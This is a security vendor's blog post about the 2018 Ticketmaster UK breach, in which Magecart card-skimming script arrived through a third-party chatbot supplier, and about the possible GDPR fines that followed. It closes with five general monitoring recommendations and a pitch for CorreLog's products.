Security Information & Event Management Blog | SIEM

TicketMaster UK Breach, the GDPR aftermath, and 5 things you can do to avoid these costly mistakes

/ in compliance standards, IBM Systems Magazine, GDPR / by Tony Perri

CorreLog IBM Sys Webinar 2018_GVv1_BlogIn early June 2018, Ticketmaster UK admitted to a widespread security breach that they say left 40,000 customers’ data vulnerable to theft. The breach possibly spanned a time frame as large as eight months according to RiskIQ[1] and British bank Monzo, in the months after and before the GDPR went into effect. According to RiskIQ, the dates range from December 2017 to July 2018 shortly after Ticketmaster admitted to the breach.

The details of the breach are still being discovered, but the malware responsible for the data compromised is part of a larger card skimming effort –possibly the largest ever recorded. This story is one to watch for cyber security professionals around the world. One, because the card-skimming malware known as Magecart is a very real threat to ecommerce and is still at large, and two, because this is the first high-profile breach to make headlines in the GDPR era. In fact, companies affected by this malicious script are likely unaware that they are under attack (right this second!) and won’t discover the breach until potentially catastrophic amounts of data are compromised.

The IBM/Ponemon Cost of a Date Breach Study reported in 2017 that the average time it took US cyber security professionals to discover a breach was 191 days. In their 2018 report, the average rose to 197 days; we are getting worse at fighting cyber-crime. And the investigation into the Ticketmaster UK breach by RiskIQ reported several companies were running the malicious code, that had neither reported a breach nor had taken remediation efforts. Presumably they were unaware.

Click here to watch Correlog/IBM Systems Magazine GDPR Webinar

The infected code in question came from one of Ticketmaster’s third-party vendors, Inbenta, an AI company that supplied custom JavaScript scripts to Ticketmaster for chatbot functionality on their website. Card skimmers have increased in ecommerce in recent years, and in the past, they were injected into the code of specific websites. Now, malware attackers have found an easier way to collect card data by infiltrating third-party software code providers. Effectively, instead of only affecting one website at a time with malware, if cyber-attackers infiltrate software suppliers, they can affect every company the supplier sold to.

Instances of third-party breaches that penetrate network infrastructures are tricky to mitigate. It is common for large companies to purchase software from smaller vendors to increase the functionality of their own network. However, when the security ecosystem of a larger company far surpasses that of one of their suppliers, the vulnerabilities of their suppliers suddenly and tragically become their own.

Inbenta has not provided the public with the details of how their systems were compromised, but we do know certain steps that could have been taken in this case that could have dramatically reduced the scale of the breach both from Inbenta and Ticketmaster. UK’s The Times reports that Ticketmaster’s fines under the GDPR could reach up to €20 million the post-GDPR fine amount. Real-time breach notifications may have reduced the fine but the time to discover the breach was just too long.

 With the Magecart scam still active, and the constant threat of cyber attacks on the horizon, here are five steps that could save you from suffering a long and costly security breach like that of Ticketmaster.

  1. Have good File Integrity Monitoring (FIM) in place across both mainframe and distributed systems. Infosec with FIM in place will reveal any attempt to alter (or even view) the pristine state of your servers’ operating systems.
  2. Have port monitoring software. Any exfiltrated data sent/received through watched ports will notify your security admin, or better yet trigger automation to close the port.
  3. Monitor IP addresses with IP filtering and Network Address Translation to better understand intrusion points from apps and web servers.
  4. Have log data on all of these things, especially on third party network access points.
  5. Lastly, make sure the log data is run through a correlation engine. If your computer is cloned, criminals might be able to fool your security systems. But with correlation software you can see if the cloned computer’s behavior is anomalous compared to information about existing systems you know to have normal activity.
It is easy to overlook these steps, leaving your company vulnerable. When IT departments are too busy putting out fires to just manage the work already in the queue, these necessary security measures can likely be overlooked. However, maintaining your cyber-security policies does not need to be complicated or costly. CorreLog Products are the most cost-effective, easy-to-use tools that offer set and forget software for your security operations. To learn more about CorreLog’s full suite of data security solutions for Windows/UNIX and Mainframe systems visit



0 replies